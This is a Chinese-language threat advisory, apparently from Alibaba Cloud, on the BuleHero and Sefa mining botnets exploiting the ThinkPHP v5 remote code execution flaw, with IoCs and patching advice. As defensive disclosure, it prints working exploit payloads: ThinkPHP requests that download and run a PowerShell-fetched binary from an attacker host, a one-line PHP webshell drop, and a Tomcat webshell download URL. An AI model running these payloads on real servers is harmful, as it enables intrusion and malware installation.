威胁预警|多个挖矿僵尸网络开始使用ThinkPHP v5漏洞 威胁升级

本文涉及的产品
Web应用防火墙 3.0,每月20元额度 3个月
云安全基线管理CSPM免费试用,1000次1年
云安全中心漏洞修复资源包免费试用,100次1年
简介: 12月10日ThinkPHP团队发布了版本更新,修复了一处远程命令执行漏洞,该漏洞是由于ThinkPHP框架对控制器没有进行严格的安全过滤,致使攻击者可以伪造恶意参数进行代码执行。12月11日阿里云即发布威胁预警,表示捕获到首例利用漏洞的攻击案例,并提醒用户及时进行漏洞修复和攻击防范。

前言

12月10日ThinkPHP团队发布了版本更新,修复了一处远程命令执行漏洞,该漏洞是由于ThinkPHP框架对控制器没有进行严格的安全过滤,致使攻击者可以伪造恶意参数进行代码执行。12月11日阿里云即发布威胁预警,表示捕获到首例利用漏洞的攻击案例,并提醒用户及时进行漏洞修复和攻击防范。

近日,阿里云安全专家发现已有挖矿僵尸网络开始利用ThinkPHP v5漏洞进行广泛传播威胁升级,并成功捕获到两个进行追踪分析。安全专家分析: 这两个僵尸网络都使用蠕虫形式进行大范围传播,其中BuleHero具备内网扩散的功能,暴露在互联网上的漏洞主机存在很大的被感染风险。一旦主机被感染,将会成为黑客的肉鸡进行挖矿和网络攻击,恶意行为占用主机CPU资源,会严重影响正常业务运行。另外,物联网僵尸网络Sefa也加入争夺漏洞主机的控制权中。

ThinkPHP v5漏洞严重且影响广泛,安全专家预计会有更多的僵尸网络使用此漏洞进行扩张,提醒用户加强关注,并建议按照文末解决方案进行防御。

详细分析如下:

一、BuleHero
BuleHero是一个利用多种安全漏洞入侵,并控制windows服务器挖矿牟取利益的僵尸网络。阿里云监控到该僵尸网络从12月19日新增利用 ThinkPhp远程命令执行漏洞进行攻击传播。BuleHero使用蠕虫方式复制和传播,僵尸网络的攻击模块会对内网进行攻击,一旦感染该恶意软件,企业内网将会遭受损失。

漏洞利用:
利用漏洞下载恶意二进制文件并执行。该文件是僵尸网络下载器,会继续下载和释放多个可执行文件,包括挖矿软件挖掘门罗币和漏洞利用模块进行攻击和传播。

  • 漏洞利用方式1:直接执行powershell
    攻击payload: s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/15.exe');start C:/15.exe
  • 漏洞利用方式2:利用漏洞上传文件名为hydra.php的webshell,该webshell可执行后门命令,接着利用webshell执行powershell代码
    攻击payload1: s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php $action = $_GET['xcmd'];system($action);?^>>hydra.php

攻击payload2: /hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/10.exe');start C:/10.exe

内网威胁:
BuleHero使用多种漏洞进行内网快速扩散,对企业内网构成重大安全威胁。BuleHero会获取本地IP地址,通过访问http://2018.ip138.com/ic.asp 获取所在公网ip地址,并在C:WindowsInfusedAppePriessip.txt生成扫描的IP地址段,IP段包含本地网络的B段和所在公网的B段,以及随机生成的公网地址。BuleHero会首先使用永恒之蓝漏洞和ipc$爆破攻击445端口和139端口,完成后才会使用web框架漏洞进行入侵。
1

生成的扫描地址


_

扫描内网地址

_

攻击Thinkphp v5漏洞

BuleHero网络攻击趋势:

我们监控到BuleHero新增thinkphp5攻击方式发生在12月19日,从该日开始BuleHero网络攻击量大幅上升,可见传播速度之快。
2

其它漏洞利用方式:
1、Tomcat PUT方式任意文件上传漏洞(CVE-2017-12615)
利用漏洞上传名为FxCodeShell.jsp的webshell,该webshell具备下载文件并执行的功能:
/FxCodeShell.jsp?wiew=FxxkMyLie1836710Aa&os=1&address=http://a46.bulehero.in/download.exe&wiew=FxxkMyLie1836710Aa&os=1&address=http://a46.bulehero.in/download.exe
2、Struts2远程代码执行漏洞(CVE-2017-5638)
3、WebLogic WLS组件远程代码执行漏洞(CVE-2017-10271)
4、永恒之蓝漏洞(MS-17-010)
5、ipc$爆破攻击,使用弱口令爆破后使用mimikatz提权
_

二、Sefa

12月25日阿里云监控到Sefa僵尸网络开始使用ThinkPhp V5广泛传播,Sefa是一个Mirai变种,不同于Bulehero,Sefa专注于建立物联网僵尸网络挖掘门罗币。本次捕获的Sefa样本开始利用ThinkPhp V5漏洞控制Linux服务器进行挖矿。

漏洞利用:
利用漏洞下载并执行shell文件,该shell文件会下载名为mcoin的挖矿软件,继续下载名为sefa.x86的攻击模块,扫描随机生成的IP地址进行蠕虫传播。

攻击利用payload:
13_41_51__12_26_2018

shell文件:
shell_
攻击payload
攻击模块反编译
payload

三、防范建议

阿里云安全团队建议使用了ThinkPHP v5版本的用户尽快升级到最新版本,v5.0.23和v5.1.31为安全版本。

  • 对于不能及时升级的用户请及时使用阿里云WAF来抵御攻击,确保企业正常业务运行。
  • 已购买阿里云云防火墙的用户可开启IPS拦截模式和虚拟补丁功能,云防火墙已经支持对上述攻击方式的自动化防御和拦截。
  • 购买安全管家服务,您能够在阿里云安全专家指导下进行安全加固及优化,避免系统受到上述攻击的影响。

IoCs:
恶意链接:
hxxp://a46[.]bulehero[.]in/download.exe
hxxp://a46[.]bulehero[.]in/mscteui.exe
hxxp://a88[.]bulehero[.]in:57890/Cfg.ini
hxxp://205[.]185[.]113[.]123/ex.sh
hxxp://205[.]185[.]113[.]123/mcoin
hxxp://205[.]185[.]113[.]123/bins/sefa.x86
hxxp://205[.]185[.]113[.]123/bins/sefa.arm7
hxxp://205[.]185[.]113[.]123/bins/sefa.arm
hxxp://205[.]185[.]113[.]123/bins/sefa.arm5
hxxp://205[.]185[.]113[.]123/bins/sefa.arm6
hxxp://205[.]185[.]113[.]123/bins/sefa.m68k
hxxp://205[.]185[.]113[.]123/bins/sefa.mips
hxxp://205[.]185[.]113[.]123/bins/sefa.mpsl
hxxp://205[.]185[.]113[.]123/bins/sefa.ppc

恶意文件:
zuihou_

本文作者:桑铎

相关文章
|
3天前
|
SQL 安全 算法
网络安全与信息安全:关于网络安全漏洞、加密技术、安全意识等方面的知识分享
【9月更文挑战第29天】随着互联网的普及,网络安全问题日益严重。本文将介绍网络安全漏洞、加密技术以及安全意识等方面的内容,帮助读者了解网络安全的重要性,提高自身的网络安全意识。
|
5天前
|
安全 网络安全 数据安全/隐私保护
:关于网络安全漏洞、加密技术、安全意识等
本文介绍了网络安全与信息安全的基本概念,强调了二者在数据安全中的重要性。网络安全旨在保护计算机网络免受非法访问与破坏,而信息安全则侧重于保护信息资产。文章分析了网络安全漏洞及信息泄露带来的风险,提出了提升安全意识的重要性,包括保持警惕、强化密码、安装安全软件、备份数据以及加密通信等方法,并提供了简单的AES加密解密Python示例代码以增强数据安全性。通过采取有效措施,我们可以显著降低数据安全风险。
21 4
|
6天前
|
SQL 安全 网络安全
网络安全与信息安全:关于网络安全漏洞、加密技术、安全意识等方面的知识分享##
本文将探讨网络安全与信息安全领域的关键方面,包括网络安全漏洞、加密技术和安全意识。我们将深入分析这些概念,并提供实用的建议和示例,以帮助读者提升网络安全技能和意识。 ##
|
1天前
|
存储 安全 网络安全
揭秘网络安全的盾牌与剑:漏洞防御与加密技术
【9月更文挑战第31天】在数字时代的浪潮中,网络安全和信息安全成为了保护个人隐私和企业资产的重要屏障。本文将通过浅显易懂的语言和生动的比喻,带你深入了解网络安全漏洞、加密技术的奥秘,以及如何培养安全意识。我们将一起探索网络安全的“盾牌”和“剑”,了解它们如何守护我们的数字世界。
105 61
|
2天前
|
SQL 安全 程序员
网络安全与信息安全:关于网络安全漏洞、加密技术、安全意识等方面的知识分享
【9月更文挑战第30天】在数字化时代,网络安全和信息安全已成为全球关注的焦点。本文将探讨网络安全漏洞、加密技术以及提升安全意识的重要性。我们将通过代码示例,深入理解网络安全的基础知识,包括常见的网络攻击手段、防御策略和加密技术的实际应用。同时,我们还将讨论如何提高个人和企业的安全意识,以应对日益复杂的网络安全威胁。
|
5天前
|
人工智能 供应链 安全
网络安全与信息安全:构建数字世界的坚固防线在当今数字化时代,网络安全已成为维护个人隐私、企业机密和国家安全的重要基石。本文旨在探讨网络安全漏洞、加密技术及安全意识等关键领域,通过深入浅出的方式,引导读者理解网络安全的核心要素,并分享实用的防护策略,共同守护我们的数字世界。
随着互联网技术的飞速发展,网络安全威胁日益凸显,成为全球关注的焦点。本文聚焦网络安全的三大核心议题——网络安全漏洞、加密技术与安全意识,旨在揭示它们之间的相互关联与重要性。通过剖析真实案例,展现网络攻击的复杂性与破坏力;解析加密技术的原理与实践,强调其在保护数据安全中的关键作用;同时,倡导提升公众安全意识,构建多层次的网络安全防护体系。本文不仅为专业人士提供技术参考,也旨在提高普罗大众的网络安全认知,共同筑牢数字世界的安全防线。
|
1天前
|
存储 安全 网络安全
网络安全与信息安全:关于网络安全漏洞、加密技术、安全意识等方面的知识分享
【9月更文挑战第31天】在数字化时代,网络安全和信息安全成为了我们生活中不可或缺的一部分。本文将从网络安全漏洞、加密技术和安全意识等方面进行知识分享,帮助读者更好地了解和保护自己的网络安全。
|
1天前
|
存储 安全 算法
网络安全的盾牌与利剑:漏洞防范与加密技术解析
【9月更文挑战第31天】在数字时代的浪潮中,网络安全成为守护个人隐私和组织资产的重要屏障。本文将深入探讨网络安全中的两大关键要素:安全漏洞和加密技术。我们将从漏洞的类型、检测方法到如何有效修补,逐一剖析;同时,对加密技术的基本原理、应用实例进行详细解读。文章旨在为读者提供一套实用的网络安全知识框架,帮助提升网络防护意识和技能,确保在日益复杂的网络环境中保护好每一份数据。
11 3
|
2天前
|
存储 安全 网络安全
网络安全与信息安全:关于网络安全漏洞、加密技术、安全意识等方面的知识分享
【9月更文挑战第30天】在数字化时代,网络安全和信息安全已成为我们生活中不可或缺的一部分。本文将介绍网络安全漏洞的概念、加密技术的基本原理以及如何提高个人和组织的安全意识。我们将通过实际案例分析,探讨网络安全漏洞的危害,并分享一些常见的加密技术和安全意识提升方法。无论你是网络管理员还是普通用户,这篇文章都将帮助你更好地了解网络安全和信息安全的重要性,并提供实用的建议来保护你的信息资产。
|
4天前
|
存储 SQL 安全
网络安全与信息安全:漏洞、加密与安全意识的探索之旅
【9月更文挑战第28天】在数字时代的海洋中,网络安全是航行的罗盘,信息安全则是保护船只免受风浪侵袭的坚固船体。本文将带你穿梭于网络世界的波涛之中,探索那些隐藏在水面之下的安全漏洞,揭示加密技术如何在暗流涌动中为数据保驾护航,以及为何提升安全意识能成为我们防御风暴的灯塔。
下一篇
无影云桌面